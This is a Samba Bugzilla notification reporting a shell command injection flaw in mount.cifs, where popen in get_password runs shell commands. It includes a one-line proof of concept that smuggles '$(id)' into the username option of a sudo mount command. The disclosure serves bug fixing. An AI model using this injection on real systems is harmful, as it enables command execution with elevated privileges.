https://bugzilla.samba.org/show_bug.cgi?id=14442 Bug ID: 14442 Summary: Shell command injection vulnerability in mount.cifs Product: CifsVFS Version: 2.4 Hardware: All OS: Linux Status: NEW Severity: major Priority: P5 Component: kernel fs Assignee: sfrench@xxxxxxxxx Reporter: vadim@xxxxxxxxxx QA Contact: cifs-qa@xxxxxxxxx Target Milestone: --- mount.cifs command is using "popen" library call in get_password which allows for shell command execution. Example: sudo /bin/mount -t cifs -o username="test \$(id)" //1 /mnt -- You are receiving this mail because: You are the QA Contact for the bug.
